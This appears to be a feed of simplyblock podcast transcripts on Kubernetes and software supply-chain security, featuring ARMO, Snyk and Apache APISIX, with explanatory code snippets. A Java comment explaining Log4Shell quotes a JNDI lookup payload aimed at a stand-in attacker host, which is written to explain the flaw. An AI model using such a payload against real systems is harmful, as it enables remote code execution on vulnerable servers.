So you can configure the controls, you can set down alerts for a configurable period of time or forever. And all of these things are in order to bring you to the point where you really, really focus on the things that you need. And you increase the efficiency of your security work. You only fix what needs are these things. A good example here is an attack path. People, I mean, it’s called an attack chain, an attack vector, kill chain, there’s lots of terminology around the same thing. But basically what it says is that there’s a step by step task or thing that an attacker would use in order to compromise your entity. There are different entry points that are caused by either misconfigurations or viruses or vulnerabilities, etc. So what we do is we provide a visualization of a possible attack path and say, ok, it’s sort of a, I’m hesitant to use the word node because Kubernetes, but it’s kind of a node of the subway map sort of thing where you can basically, you can check for each node what you need to fix. Sometimes there’s one node where you need to fix one misconfiguration and you’re done and you immediately hardened your infrastructure to the point where the attack path is blocked. Of course, you need to fix everything around that. But the first thing you need to do is to make sure that you’re secure now. And that really helps and it increases the efficiency.

Chris Engelbert: Right. So you’re basically cutting off the chain of possibilities so that even if a person gets to that point, it’s now stopped in its tracks, basically. All right. That’s interesting. That sounds very useful.

Oshrat Nir: Yeah, I think that’s an important thing because that’s basically our North Star where we’re saying we know that security work is hard. We know that it’s been delegated to DevOps people that don’t necessarily like it or want to do it and are overwhelmed with other things and want to do things that they find more interesting, which is great. Although, you know, security people, don’t take me personally, I work for a security company. I think it’s interesting. But my point is that, and this is, I’m sorry, this is a Snyk tagline. Sorry, Brian. But you want security tools that DevOps people will use. And that’s basically what we’re doing at ARMO. We want to create a security tool that DevOps people will use and security people will love. And again, sorry, Snyk. That’s basically the same thing, but we’re coming from the bottom, you’re from the top.

Chris Engelbert: To be honest, I think that is perfectly fine. They probably appreciate the call out, to be honest.

Right. So because we’re almost running out of time, we’re pretty much running out of time right now. Do you think that there is or what is your feeling about security as a thought at companies? Do they like neglect it a little bit? Do they see it as important as it should be? What is your feeling? Is there headroom?

Oshrat Nir: Well, I spend a lot of time on subreddits of security people. These people are very unhappy. I mean, some of them are really great professionals that want to do a good job and they feel they’re being discounted. Again, there’s this problem where there are tools that they want to use, but the DevOps that the people that they serve them to don’t want to use. So there needs to be a conversation. Security is important. Ok, F-16s run on Kubernetes. Water plants, sewage plants, a lot of important infrastructure runs on Kubernetes. So securing Kubernetes is very important. Now, in order for that to happen, everybody needs to get on board with that. And the only way to get on board with that is to have that conversation and to say, ‘ok, this is what needs to be done. This is what we think you need to do it. Are you on board? And if not, how do we get you on board?’ And one of the ways to get you on board is ok, look, you can put this in the CICD pipeline, forget about it until it reminds you. You can scan a repository every time you pull for it or an image every time you pull it. You can have a VSCode plugin or a GitHub action. And all of these things are in order to have that conversation and say, look, security is important, but we don’t want to distract you from things that you find important. And that’s a conversation that has to happen, has to happen all the time. Security doesn’t end.

Chris Engelbert: Right, right. Ok, last question. Any predictions or any thoughts on the future of security? Anything you see on the horizon that is upcoming or that needs to happen from your perspective?

Oshrat Nir: Runtime is upcoming. It’s like two years, even two years ago, what’s the thing? Nobody was talking about anything else except shift left security. You shift left. DevOps should do it. We’re done. We shifted left. And we found that even if one thing gets through our shift left, our production workloads are in danger. So next thing on the menu is runtime security.

Chris Engelbert: It’s a beautiful last sentence. Very, very nice. Thank you for being here. It was a pleasure having you. And I hope we’re going to see. I think we never met in person, which is really weird. But since we’re both in the Kubernetes space, there is a good chance we do. And I hope we really do. So thank you very much for being here.

Oshrat Nir: Thanks so much for having me, Chris.

Chris Engelbert: Great. For the audience next week, next episode. I hope you’re listening again. And thank you very much for being here as well. Thank you very much. See ya.

Key Takeaways

Oshrat Nir has been with ARMO for 1.5 years, bringing 5.5 years of experience in cloud native technologies. ARMO, the company behind Kubescape, specializes in open source-based CI/CD & Kubernetes security, allowing organizations to be fully compliant with frameworks like the NSA guidelines or the CIS benchmarks, as well as secure from code to production.

The founders of ARMO built a great product that required installing an agent in a cluster, which was highly intrusive & resource intensive. It was around five years ahead of its time, according to Oshrat. After the NSA and CISA came out with guidelines for hardening Kubernetes, the founders built an open source misconfiguration scanner based on that framework, which was Kubescape.

Kubescape quickly gained popularity, amassing thousands of stars on GitHub and became accepted by the CNCF (Cloud Native Computing Foundation) as a sandbox project – the first misconfiguration scanner in the CNCF. They’re still growing & are aiming to get to incubation in 2024.

Currently, they have two offerings: the ARMO Platform, which is the enterprise offering, and Kubescape, which is open source.

Oshrat also speaks about Snyk, which focuses on application security from a top-down approach, identifying vulnerabilities during development to prevent issues before deployment. ARMO takes a bottom-up approach, starting from the infrastructure and working upward, “We kind of do bottom up and Snyk does top down, and we kind of meet at the application.”

Oshrat also mentions how they have started to leverage eBPF to improve their scanning without changing the applications or infrastructure, which will help their users, particularly to decrease alert fatigue and the number of false positives.

ARMO is also introducing cloud-native detection and response for runtime. Since using eBPF, they are able to integrate additional anomaly detections.

Oshrat also spoke about the importance of the usability of the processes, which is why they have configurable security controls where you can quiet down or configure alerts for a period of time so you can focus on what you need, which greatly increases the efficiency of your security work.

Oshrat underscores the need for dialogue and consensus between security and DevOps teams to prioritize security without overwhelming developers.

Looking ahead, Oshrat predicts that runtime security will be a critical focus, just as shift left security was in the past. ARMO has you covered already.

Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk
https://www.simplyblock.io/blog/automated-vulnerability-detection-throughout-your-pipeline-with-brian-vermeer-from-snyk-video/ (Fri, 10 May 2024)

This interview is part of simplyblock’s Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we’re joined by Brian Vermeer (Twitter/X, Personal Blog) from Snyk, a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline. He talks about the necessity of multiple checks, the commonly found threats, and how important it is to rebuild images for every deployment, even if the code hasn’t changed.

EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That’s always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It’s not Synk. It’s actually Snyk. Some people say Snyk, but I don’t like that. And the founder wants it to be Snyk. And it’s actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: That’s always hard to talk about yourself, right? I’m Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I’ve been a long term Java developer, mostly back end developer for all sorts of jobs within the Netherlands. Java champion, very active in the community, specifically the Dutch community. So the Netherlands Java user group and adjacent Java user groups do some stuff in the virtual Java user group that we just relaunched. That I’ve tried to be active and I’m just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is we started as a software composite analysis tool and people just bring in libraries. They have no clue what they’re bringing in and what kind of implications come with that. So we can do tests on that. We can report of that. We can make reports of that. And you can make the decisions. So now at least you know what you’re getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won’t say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well that these machines also had an operating system. Right. So I’m not saying it’s getting worse, but developers get into more responsibility because let’s say we’re doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers. That’s nowadays a job. What DevOps is, you probably get a lot of questions about tooling and that, but apparently what we did is tearing down the wall between old fashioned developer creation and getting things to production. So the ops folks, so we’re now responsible as a team to do all of that. And now your container or your environment, your cluster, your code is all together in your Git repository. So it’s all code now. And the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams now to all in one team that we need to create and maintain stuff. So I don’t, I don’t think we’re getting into worse problems. I think we’re, we’re shifting the problems and it’s getting easier to get into problems. That’s, that’s what I, yeah.

Chris Engelbert: Yeah. Okay. We’ve broadened the scope of where you could potentially run into issues. So the way it works is that Snyk, I need to remember to say Snyk and not Synk because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync, sync is different. It’s, it’s not, it’s not awkward and it’s not Worcester. Anyway. So, so that means the, the tooling is actually looking into, I think the dependencies, built environment, whatever ends up in your Docker container or your container image. Let’s say that way, nobody’s using Docker anymore. And all those other things. So basically everything along the pipeline or the built pipeline, right?

Brian Vermeer: Yeah. You can say that actually we start at the custom code that you're writing. So we're doing static analysis on that as well. We might combine that with what we know about your dependencies and transitive dependencies, like, "hey, you bring in a Spring Boot starter that has a ton of implications on how many libraries come in." Are these affected? Yes or no, et cetera, et cetera. Then we go one layer deeper, or around that, to your container images. Let's say it's Docker, because it's still the most commonly used, but whatever: any image is built on a base image, and probably you put some binaries in there. So what's there? That's another shell around the whole application. And then, in the end, you get to the configuration for your infrastructure as code. That can go wrong by not having a security context, by policies that are not set properly, or by pods that you gave more privileges than they should have because, hey, it works on my machine, right? Let's ship it. These kinds of things. So on all these four fronts, we try to provide tooling and test capabilities in such a way that you can choose how you want to utilize them: in a CI pipeline, on your local machine, in between, or as part of your build, whatever fits your needs. Instead of, "hey, this needs to be part of your build pipeline, because that's how the tool works." I was a backend developer myself for a long time, and I was the person that was like, if we need to satisfy that tool, I will find a way around it.
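
To make those four levels a bit more concrete, here is a minimal sketch of how they map onto the Snyk CLI. The commands reflect the CLI as we understand it at the time of writing, and the project paths and image name are made up for the example, so check snyk --help for your version:

```bash
# Hypothetical project layout and image name; adjust to your own repository.
snyk code test                          # static analysis of the custom code you write
snyk test                               # open source dependencies, including transitive ones
snyk container test myorg/myapp:1.0.0   # container image: base image layers and bundled binaries
snyk iac test ./deploy                  # infrastructure as code: security contexts, privileges, policies
```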

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you, say you start at a code level, I think simple, like the still most common thing, like SQL injection issues, all that kind of stuff, that is probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path traversal injections, cross-site scripting, all these kinds of things will get flagged and, if possible, we will give you remediation advice on that. And then we go levels deeper. So you can almost say it's four different types of scanner that you can use in whatever way you want. Some people are like, no, I'm only using the dependency analysis stuff. That's also fine. It's just four different capabilities for basically four levels in your application, because it's no longer just the binary that you put in. It's more than that, as we just discussed.
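
For readers who want a concrete picture of that kind of remediation advice, here is a small, generic Java sketch (our illustration, not actual Snyk output) of the classic SQL injection fix:

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class UserLookup {

    // Vulnerable: attacker-controlled input is concatenated into the SQL string.
    ResultSet findUserUnsafe(Connection con, String name) throws SQLException {
        String sql = "SELECT * FROM users WHERE name = '" + name + "'";
        return con.createStatement().executeQuery(sql);
    }

    // Remediation: bind the value as a parameter instead of concatenating it.
    ResultSet findUserSafe(Connection con, String name) throws SQLException {
        PreparedStatement ps = con.prepareStatement("SELECT * FROM users WHERE name = ?");
        ps.setString(1, name);
        return ps.executeQuery();
    }
}
```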

Chris Engelbert: So, when we look at the recent and not so recent past... I mean, we're both coming from the Java world. You said you were also a Java programmer for a long time. I am too. I think the Java world isn't necessarily known for massive CVEs. Except Log4Shell.

Brian Vermeer: Yeah, that was a big,

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is that in the Java world it's either not so big or very big. There's no in between, or at least it doesn't get the amount of attention. But yeah, Log4Shell was a big one. First of all, props to the folks that maintain that library, because I think there were only three active maintainers at the point when the thing came out, and it's a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at them as if they were doing a bad job. It was just three guys that voluntarily maintained it.

Chris Engelbert: So for the people that do not know what Log4Shell was. So Log4J is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, so Log4Shell was, I think, at least from what I can remember, probably like the biggest CVE in the Java world, ever since I joined.
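
As a rough sketch of why Log4Shell was so dangerous: on vulnerable Log4j 2.x versions (before message lookups were disabled in 2.15.0), merely logging attacker-controlled text could trigger a JNDI lookup and load remote code. The class below is purely illustrative:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginService {

    private static final Logger log = LogManager.getLogger(LoginService.class);

    void onFailedLogin(String username) {
        // With a vulnerable Log4j version, a username such as
        // "${jndi:ldap://attacker.example/a}" was resolved as a lookup,
        // which could fetch and execute code from a remote server.
        log.warn("Failed login attempt for user {}", username);
    }
}
```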

Brian Vermeer: Maybe that one, but in 2017 we had the Apache Struts one that blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I'm not talking about Struts because that was so long deprecated by that point in time. It was... they deserved it. No, but seriously, true, the Struts one was also pretty big. But since we are recording this on April 3rd, there was a very interesting thing just two or three days ago, around April 1st. I think it was actually April 1st, because I initially thought it was an April Fools' joke, but unfortunately it was not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it on April 1st. To be honest, initially I thought, okay, that's a really bad April Fools' joke. So what we're talking about is the XZ issue. Maybe you want to say a few words about that?

Brian Vermeer: Well, let's keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. Long story short, I'm not sure if they already created exploits for it. I didn't actually try it, because we've got folks doing the research. But apparently, because of that tool, you could do nasty stuff such as arbitrary code execution or things with secure connections. And it comes with your operating system. So that means if you have a Docker image, or whatever image, that is based on a certain well-known Linux distribution, you might be affected, regardless of what your application does. And it's a big one. If you want to go deeper, there are tons of blogs by people that can explain what the actual problem was. But I think for general developers: don't shut your eyes and say it's not on my machine. It might be in your container because you're using a now-outdated image.

Chris Engelbert: I think there are two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you're not using any of the self-built distributions, you're probably good. But what I found more interesting about it is that this backdoor was introduced by a person that had been working on the tool for quite a while, like over a year, basically gaining the trust of the actual maintainers and eventually sneaking stuff in. And that is why I think tools like Snyk, or, let's be blunt, some of the competitors, are so important, right? Because it's really hard to follow all of the new CVEs, and sometimes they don't blow up this big, so you probably don't even hear about them. For that reason, it's really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team this is a side concern: you're building stuff, and you don't focus on manually checking whatever is coming in and whether it's vulnerable or not. But you should be aware of these kinds of things, so that when they come in, you can make appropriate choices. I'm not saying you have to fix it. That's up to you, your threat level, and whatever is going on in your company, but you need to be able to make these decisions based on accurate knowledge. And yeah, you don't want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for your security risk.

Chris Engelbert: Right. And from your own feeling, like, in the past, we mostly deployed like on-prem installations or in like private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. The short answer is yes: there are more things that we have under our control as a development team, and we do not always have the necessary specialties within the team. So we're doing the best we can, but that means we've got multiple attack surfaces. The connection to your application is one thing, but if I can get into your container for some reason, I can use that. Some things in containers or in operating systems might not be directly exploitable, but they can be part of a chain that causes a problem. If there's one hole, I can get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you're giving people more and more ammunition. And as we automate certain things, we do not always have the necessary knowledge about them, which might become a bigger and bigger problem. Plus the fast pace we're currently moving at. Like, tell me, 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day, like 10 years ago, we’re probably deploying once a month, you have time to test or something like that. So it’s a combination of doing all within one team, which yes, we should do, but also the fast pace that we need to release nowadays is something like, okay, we’re just doing it. The whole continuous development and continuous deployment is part of this. If you’re actually doing that, of course.

Chris Engelbert: Yeah, that's true. I think it would have been about every two weeks or so. But yeah, you normally had one week of development, one week of bug fixing and testing, and then you deployed it. Now you do something, you think it's ready, it runs through the pipeline, and in the best case it gets deployed immediately. And if something breaks, you fix it. Or, in the worst case, you roll back if it's really bad.

Brian Vermeer: But on the other end, say you're an application developer, and you need to do that stuff in a container. Do you ship it? Are you touching your container, or rebuilding your container, if your application didn't change?

Chris Engelbert: Yes.

Brian Vermeer: Probably a lot of folks won't, because, hey, those things didn't change. But it can be that the image you base your stuff upon, your base image or however you manage that, which can be company-wide or just something you pull off Docker Hub, is another layer that might have changed, might have been fixed, or might have had vulnerabilities found in it. So it's no longer "hey, I didn't touch that application, so I don't have to rebuild." Yes, you should, because other layers in that whole application changed.
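
A small, hypothetical Dockerfile makes the point: the application layer can be byte-for-byte identical, yet the image as a whole is not, because the base layer moves underneath it. Rebuilding and rescanning is what picks up a patched, or newly vulnerable, base image:

```dockerfile
# Hypothetical image. Even if target/app.jar did not change,
# the base layer referenced by this tag may have been updated or
# may have had new vulnerabilities disclosed since the last build.
FROM eclipse-temurin:17-jre
COPY target/app.jar /opt/app/app.jar
ENTRYPOINT ["java", "-jar", "/opt/app/app.jar"]
```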

Chris Engelbert: Right, right. And I think you brought up another important factor. It might be that in the meantime, between the last deployment and now, a CVE has been found or something else happened, right? So you want to make sure you test it again. And then with other programming languages, I'm not naming names here, you might get a slightly newer version of a dependency when you do a fresh install, right? There are so many different things. Applications these days, even microservices, are so complex because they normally need so many different dependencies, and it is hard to keep an eye on that. And that kind of brings me to the next question: how does Snyk play into something like SBOM, or the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Well, it's not just a hype train. I mean, it's a serious thing. For folks that don't know, you can compare an SBOM to the ingredients and nutrition list of whatever you're about to consume. What's in there? You have no clue; the nutrition facts on the package should say what's in it, right? That's how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, "okay, I'm using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever, to create my artifact." And a consumer of that artifact is then able to search through that. Say a new CVE comes up, a new Log4Shell, let's make it big. Am I affected? That's the first question a consumer, or somebody that uses your artifact, asks. And with an SBOM you have a standardized way (well, there are three standards, but nevertheless a standardized way) of having that information and making it at least machine-searchable, to see if you are vulnerable or not. So how do we play into that? You can use our Snyk tooling to create SBOMs for your applications or for your containers, that's possible. And we have the capabilities to read SBOMs in, to see if they contain packages or artifacts with known vulnerabilities, so you can again take the appropriate measures. I think SBOMs are great from the consumer side: it's very clear what the stuff I got from the internet or from a supplier, because we're talking about supply chains all the time, is built on, and I can see if it contains problems, or potential problems, when something new comes up. And yes, we have capabilities for creating these SBOMs and scanning these SBOMs.
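
As a rough idea of what such an "ingredients list" looks like, here is a minimal fragment in the CycloneDX format, one of the standards Brian alludes to (SPDX is another). The component shown is just an example entry:

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {
      "type": "library",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

Given such a file, a consumer can match the purl entries against newly published CVEs by machine, which is exactly the "am I affected?" question above.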

Chris Engelbert: All right. We're basically out of time, but there's one more question I still want to ask. Where do you personally see the biggest trend? It could be related to Snyk or to security in general.

Brian Vermeer: The biggest trend is the hype around AI nowadays. And that is definitely a thing. People think that AI is a suitable replacement for a security engineer. I exaggerate now, but it's not, because we have demos where we let a well-known code assistant tool spit out vulnerable code, for instance. So I think the trend is two things. One is the whole software supply chain: whatever you pull in, you should look at it. The other is that if people are using AI, they shouldn't trust it blindly. And I think that goes for everything, both the stuff in your supply chain and code generated by an assistant. You should know what you're doing. It's a great tool, but don't trust it blindly, because it can also hallucinate and bring in stuff that you didn't expect if you are not aware of what you're doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely, definitely. It's a lot of fun to play with it. It's also a great tool. But you should know, first of all, that it doesn't replace developers that think. Thinking is still something an AI doesn't do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

Improve Security with API Gateways, Nicolas Fränkel https://www.simplyblock.io/blog/how-api-gateways-help-to-improve-your-security-with-nicolas-frankel-from-api7-ai-video/ Fri, 19 Apr 2024 12:13:28 +0000 https://www.simplyblock.io/?p=287 In this installment of the podcast, we talked to Nicolas Fränkel (X/Twitter) from API7.ai, the creator of Apache APISIX, a high-performance open-source API gateway. He discusses the significance of choosing tools that fit your needs and emphasizes making choices based on what works best for your requirements. This interview is part of the simplyblock Cloud Commute […]

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.

In this installment of the podcast, we talked to Nicolas Fränkel (X/Twitter) from API7.ai, the creator of Apache APISIX, a high-performance open-source API gateway. He discusses the significance of choosing tools that fit your needs and emphasizes making choices based on what works best for your requirements.

This interview is part of the simplyblock Cloud Commute Podcast, available on Youtube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.


Chris Engelbert: Hello, everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast, your weekly 20-minute podcast show about cloud, cloud security, cloud storage, cloud Kubernetes. Today I have Nicolas with me, Nicolas Frankel. I think it’s a German last name, right?

Nicolas Fränkel: It's a German last name. I'm French, and it's mostly spoken by English speakers, so I don't care anymore.

Chris Engelbert: All right, fair enough. You can jump right into that. Tell us a little bit about you, where you’re from, why you have a German last name, and being French, and everything else.

Nicolas Fränkel: I'm Nicolas Frankel. Yeah, I'm French. I was born in France. For a long time, I was a consultant in different roles: developer, architect, cloud architect, solution architect, whatever. I worked on projects with crazy deadlines, sometimes stupid management, changing requirements, and stuff. I got very dissatisfied with it, and for a couple of years now I've been doing developer advocacy.

Chris Engelbert: Right, right. And we know each other from the Java world, so you’ve been a lot around the Java community for a long, long while.

Nicolas Fränkel: Yeah, I think we first met at conferences. I don’t remember which one, because it was quite long ago, but my main focus at the time was Java and the JVM.

Chris Engelbert: I think the first time was actually still JavaOne or something. So people that know a little bit of the Java space and remember JavaOne can guess how long ago this must have been. Right, so right now you're working for a company called API7.

Nicolas Fränkel: So API7 is a company that is working on the Apache APISIX. Yeah, I agree. That’s funny. That was probably designed by engineers with no billboard marketing, but it’s still good, because 7 is better than 6, right? So Apache APISIX is an API gateway, and it’s an Apache project, obviously.

Chris Engelbert: All right, so you mentioned APISIX, and you obviously have the merch on you. So API7 is like the Python version, right? It’s one-based. APISIX is the zero-based version. We can argue which one is better.

Nicolas Fränkel: It's a bit more complicated. So API7 is the company. APISIX is the Apache project, but API7 also has an offering called API7. So either you have an API7 on-premise version or an API7 cloud version. You can think about it just like Confluent and Kafka. Of course, again, API7, APISIX, it's a bit confusing. But just forget about the numbering. It's just Confluent and Kafka. Confluent contributes to Kafka, but they still have their own offering. They do support for their own products, and they also have on-premise and cloud versions.

Chris Engelbert: All right, so that means that API7 as a company basically has probably the majority of engineers working on APISIX, which itself is a project in the Apache Foundation, right?

Nicolas Fränkel: I wouldn't say they have the majority. To be honest, I didn't check. But regarding the Apache Foundation, in order for a project to be promoted to top level, you must uphold a certain number of conditions. The process goes like this: you go to the Apache Foundation, you donate the project, and then you become part of the incubator. And in order to be promoted, you need to, as I mentioned, uphold a certain number of conditions, not all of which I checked. But one of them is that you must have enough committers from different companies, so that one company is not the only driving force behind the product, which in my opinion is a good thing. Whereas with the CNCF, a project is managed by a company or by different companies. In the Apache Foundation, the granularity is the contributor. A contributor can, of course, change company afterwards. But in order to actually graduate from the incubator, you must have a certain number of people from different companies.

Chris Engelbert: Yeah, Ok. That makes sense. It’s supposed to be more of a community thing. I think that is the big thing with the Apache Foundation.

Nicolas Fränkel: That’s the whole point.

Chris Engelbert: Also, I think also in comparison or in difference from the Eclipse Foundation, where a lot of the projects are basically company driven.

Nicolas Fränkel: I don't know about Eclipse. I know about the CNCF. I heard that in order to give your project to the CNCF, you need to pay them money, which is a bit weird. Again, I didn't fact-check that. But it's company driven. You talk to companies. The CNCF talks to companies, whereas the Apache Foundation talks to people.

Chris Engelbert: Yeah, OK. Fair enough. All right. Let’s see. You said it’s an API gateway. So for the people that have not used an API gateway and have no idea what that means– and I think APISIX is a little bit more than just a standard gateway. So maybe can you elaborate a little bit?

Nicolas Fränkel: You can think about an API gateway as a reverse proxy on steroids that allows you to do stuff that is focused on APIs. I always use the same example of rate limiting. Rate limiting has been a feature of reverse proxies for decades, because you want to protect your information system from distributed denial-of-service attacks. The thing is, it works very well, but you treat every one of your clients the same. So you rate limit them exactly the same. Now imagine you are providing APIs. There is a huge chance that you will want to offer plans so that a couple of customers get a higher limit than others. You can probably do that in a reverse proxy, but you would now need to add business logic into the reverse proxy. And as I mentioned, reverse proxies were designed at a time when they were purely technical. They don't like business logic so much. Nothing prevents you from creating a C module, putting it in NGINX, and doing that. But then you encounter a couple of issues.

The first one is that with the open source version of NGINX, if you need to change the configuration, you need to switch it off and on again. If it sits at the entrance of your information system, that's not great. And the business logic might change every now and then, probably quite often, which is also not great. That's why those technical components in general are not happy about business logic; you want to move the business logic away from them. With API gateways, in my definition (because you will find plenty of definitions), first, you can change the configuration dynamically. You don't need to switch it off and on again. And although you still don't want too much business logic in there, it's not unfriendly to business logic, meaning that in Apache APISIX, for example, you would create your plugin in Lua, and then you can change the Lua code. And then it's fine.

Chris Engelbert: Right. Ok, so APISIX also uses Lua. That seems to be pretty much a staple among a lot of the implementations.

Nicolas Fränkel: Not really. I mean, regarding the architecture, it's based on NGINX. But as I mentioned, NGINX is not great for that. So on top of that, you have something called OpenResty. And OpenResty is actually Lua code that allows you to change the configuration of NGINX dynamically. The thing is, the configuration of OpenResty itself maps only one-to-one to the configuration of NGINX. So if you are doing it at scale, it's not the best maintainability ever. So Apache APISIX provides you with abstractions: what is an upstream, what is a route, so that you can reuse an upstream across several routes, what is a service. And everything is plugin-based. So it's easy for routes to add a plugin, remove a plugin, change the configuration of a plugin, and so on and so forth.
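
To give a feel for those abstractions, here is a minimal sketch against the APISIX Admin API: a route that attaches the rate-limiting plugin and points at an upstream. The admin port, API key, and backend address are placeholders and may differ in your installation, so check the current APISIX documentation for the exact defaults:

```bash
# Placeholders: admin key, port (9180 in recent releases), backend address.
curl -s http://127.0.0.1:9180/apisix/admin/routes/1 \
  -H "X-API-KEY: ${APISIX_ADMIN_KEY}" -X PUT -d '
{
  "uri": "/orders/*",
  "upstream": {
    "type": "roundrobin",
    "nodes": { "orders-svc:8080": 1 }
  },
  "plugins": {
    "limit-count": {
      "count": 100,
      "time_window": 60,
      "rejected_code": 429,
      "key": "remote_addr"
    }
  }
}'
```

Because the configuration is applied through an API call, the change takes effect without restarting the gateway, which is exactly the difference from plain NGINX that Nicolas describes.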

Chris Engelbert: Right, So from an applications perspective, or application developer’s perspective, do I need to be aware of that? Or does that all happen transparently to me?

Nicolas Fränkel: That's the thing. It's an infrastructure component. So normally, you shouldn't care about it. You mostly don't care about it. Even better, a lot of stuff that you would do with frameworks or libraries like Spring or whatever, you can remove from every individual app that you create and put into this entry point at a very specific place. So your applications themselves don't need to protect against DDoS, because the API gateway will do it for you. And you can also have authentication, authorization, caching, whatever. You can mostly move all those features away from your app, focus on your business logic, and just use the plugins that you need.

Chris Engelbert: Right, so you mentioned authentication. So I think it will hand me a JWT token or whatever kind of thing.

Nicolas Fränkel: For that we have multiple plugins. So yes, we have a JWT plugin. We have a Keycloak integration with a plugin. We have OpenID Connect. We have lots and lots of plugins. And since it's plugin-based, nothing prevents you from creating your own plugin, either to interface with one of your own proprietary authentication systems or, if there is something generic that you want, you can always contribute it back to the Apache Foundation, and then it becomes part of the product. And I mean, that's the beauty of open source.
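
As a sketch of how that looks with the jwt-auth plugin (the consumer name, key, and secret below are made up; the exact fields are documented in the APISIX plugin reference): you register a consumer with a JWT credential and then require the plugin on the route, so the application behind it no longer has to validate tokens itself.

```bash
# 1. Register a consumer with a JWT credential (placeholder values).
curl -s http://127.0.0.1:9180/apisix/admin/consumers \
  -H "X-API-KEY: ${APISIX_ADMIN_KEY}" -X PUT -d '
{
  "username": "team_a",
  "plugins": {
    "jwt-auth": { "key": "team-a-key", "secret": "change-me" }
  }
}'

# 2. Require a valid JWT on an existing route.
curl -s http://127.0.0.1:9180/apisix/admin/routes/1 \
  -H "X-API-KEY: ${APISIX_ADMIN_KEY}" -X PATCH -d '
{
  "plugins": { "jwt-auth": {} }
}'
```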

